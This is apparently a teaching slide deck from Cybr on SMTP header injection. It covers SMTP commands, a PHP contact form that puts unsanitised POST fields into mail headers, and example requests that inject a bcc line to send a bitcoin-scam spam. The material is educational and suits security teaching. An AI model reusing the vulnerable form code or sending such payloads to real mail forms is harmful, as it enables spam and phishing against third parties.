Christophe Limpalair
Co-Founder of Cybr, and Course Author
SMTP Header Injections - Overview
SMTP
Simple Mail Transfer Protocol
SMTP
TO: eric@example.com.com
From: admin@cybr.com
Reply-To: christophe@cybr.com
Subject: Example subject
MAIL FROM:<admin@cybr.com>
RCPT TO:<eric@example.com>
DATA
TO: eric@example.com.com
From: admin@cybr.com
Reply-To: christophe@cybr.com
Subject: Example subject
MAIL FROM:<admin@cybr.com>
RCPT TO:<eric@example.com>
RCPT TO:<large-spam-list@example.com>
DATA
\nbcc: large-spam-list@example.comSMTP Header Injections Impact
- Send copies of emails to a 3rd party
- Spam emails
- Deliver phishing attacks that look legitimate
- Alter the content of emails
- Potentially attach viruses and malware to emails
Overview of SMTP
Overview of SMTP
- MAIL FROM
- RCPT TO
- DATA
Overview of SMTP
- MAIL FROM - who the email is from
- RCPT TO - sets the recipient
- DATA - begins the email payload (email headers + message body)
Email Headers
- From - displays the sender address (could be different than MAIL FROM)
- To - displays the recipient (could be different than RCPT TO)
> MAIL FROM:<admin@cybr.com>
< 250 Ok
> RCPT TO:<eric@example.com>
< 250 Ok
> RCPT TO:<shawna@example.com>
< 250 Ok
> DATA
< 354 End data with <CR><LF>.<CR><LF>
> From: "Christophe Limpalair" <christophe@cybr.com>
> To: Cybr friends <cybr-friends@cybr.com>
> Date: Tue, 1 August 2020 16:02:43 -0500
> Subject: Important email to read!
>
> Hello all,
> This is a very important email used to demonstrate what SMTP looks dialogue looks like.
> Your friend,
> Christophe
> .
< 250 Ok
<?php
$name = $_POST['name'];
$replyTo = $_POST['replyTo'];
$message = $_POST['message'];
$to = 'support@localhost';
$subject = $_POST['subject'];
$headers = "From: $name \n" .
"Reply-To: $replyTo";
mail($to, $subject, $message, $headers);
?>
POST /contact.php HTTP/1.1
Host: cybr.com
name=Christophe&replyTo=christophe@cybr.com&message=Reaching out to discuss...&subject=Important information
POST /contact.php HTTP/1.1
Host: cybr.com
name=Christophe&replyTo=christophe@cybr.com&message=Reaching out to discuss...&subject=Important information
POST /contact.php HTTP/1.1
Host: cybr.com
name=Christophe\nbcc: large-spam-list@example.com&replyTo=christophe@temp-mail.com&message=I feel generous today and will match the amount of bitcoin that you send me, but only if you are the first 20! Donate here: fake-link.com&subject=Free Bitcoin! Hurry!
POST /contact.php HTTP/1.1
Host: cybr.com
name=Christophe\nbcc: large-spam-list@example.com&replyTo=christophe@temp-mail.com&message=I feel generous today and will match the amount of bitcoin that you send me, but only if you are the first 20! Donate here: fake-link.com&subject=Free Bitcoin! Hurry!
> MAIL FROM:<mail-service@cybr.com>
< 250 Ok
> RCPT TO:<large-spam-list@example.com>
< 250 Ok
> RCPT TO:<christophe@temp-mail.com>
< 250 Ok
> DATA
< 354 End data with <CR><LF>.<CR><LF>
> From: "Christophe" <christophe@temp-mail.com>
> To: Support <support@cybr.com>
> Date: Tue, 1 August 2020 16:02:43 -0500
> Subject: Free Bitcoin! Hurry
>
> I feel generous today and will match the amount of bitcoin that you send me, but only if you are the first 20! Donate here: fake-link.com
> .
< 250 Ok
IMAP Injections
SMTP Header Injections Overview
By Christophe Limpalair
